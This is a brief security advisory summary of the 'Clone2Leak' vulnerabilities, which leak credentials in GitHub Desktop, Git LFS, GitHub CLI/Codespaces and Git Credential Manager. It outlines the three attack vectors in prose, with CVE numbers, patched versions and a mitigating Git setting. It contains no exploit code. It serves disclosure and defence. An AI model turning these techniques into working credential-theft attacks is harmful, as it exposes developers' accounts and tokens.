
Security researcher RyotaK from GMO Flatt Security has uncovered three interconnected vulnerabilities, collectively named ‘Clone2Leak,’ affecting major Git-based tools and services. These vulnerabilities can expose credentials by exploiting authentication request handling in Git and its credential helpers.
Affected Systems:
– GitHub Desktop
– Git LFS
– GitHub CLI/Codespaces
– Git Credential Manager
The Three Attack Vectors:
1. Carriage Return Smuggling (CVE-2025-23040, CVE-2024-50338)
– Affects GitHub Desktop and Git Credential Manager
– Exploits URL parsing of carriage return characters
– Redirects credentials to attacker-controlled servers
2. Newline Injection (CVE-2024-53263)
– Targets Git LFS
– Exploits newline character handling in .lfsconfig files
– Enables credential theft through malicious server redirection
3. Credential Retrieval Logic Flaws (CVE-2024-53858)
– Impacts GitHub CLI and Codespaces
– Involves overly permissive credential helper configurations
– Allows token theft through malicious repository cloning
Recommended Security Updates:
– GitHub Desktop: Version 3.4.12+
– Git Credential Manager: Version 2.6.1+
– Git LFS: Version 3.6.1+
– GitHub CLI: Version 2.63.0+
Additional Security Measure:
Enable Git’s ‘credential.protectProtocol’ setting for enhanced protection against credential smuggling attacks.
While no active exploits have been reported, users are strongly advised to update their systems immediately to prevent potential credential theft.